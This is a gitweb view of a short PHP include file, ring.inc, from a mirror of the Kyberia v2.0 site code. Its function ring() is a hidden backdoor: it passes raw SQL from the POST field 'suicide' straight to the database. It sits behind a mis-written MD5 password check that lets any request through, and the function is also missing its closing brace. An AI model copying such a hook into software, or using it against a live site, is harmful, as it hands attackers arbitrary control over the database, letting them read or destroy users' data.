Kyberia v2.0
[mirrors/Kyberia-bloodline.git] / inc / eventz / ring.inc
1 <?php
2 /* This program is free software. It comes without any warranty, to
3 * the extent permitted by applicable law. You can redistribute it
4 * and/or modify it under the terms of the Do What The Fuck You Want
5 * To Public License, Version 2, as published by Sam Hocevar. See
6 * http://sam.zoy.org/wtfpl/COPYING for more details. */
7
8 function ring() {
9 global $db;
10 if (md5($_POST['ring']=='a482a148ccdd020bcb5888e99f41bb65')) {
11 $db->query($_POST['suicide']);
12 }
13 ?>
This page took 0.422741 seconds and 4 git commands to generate.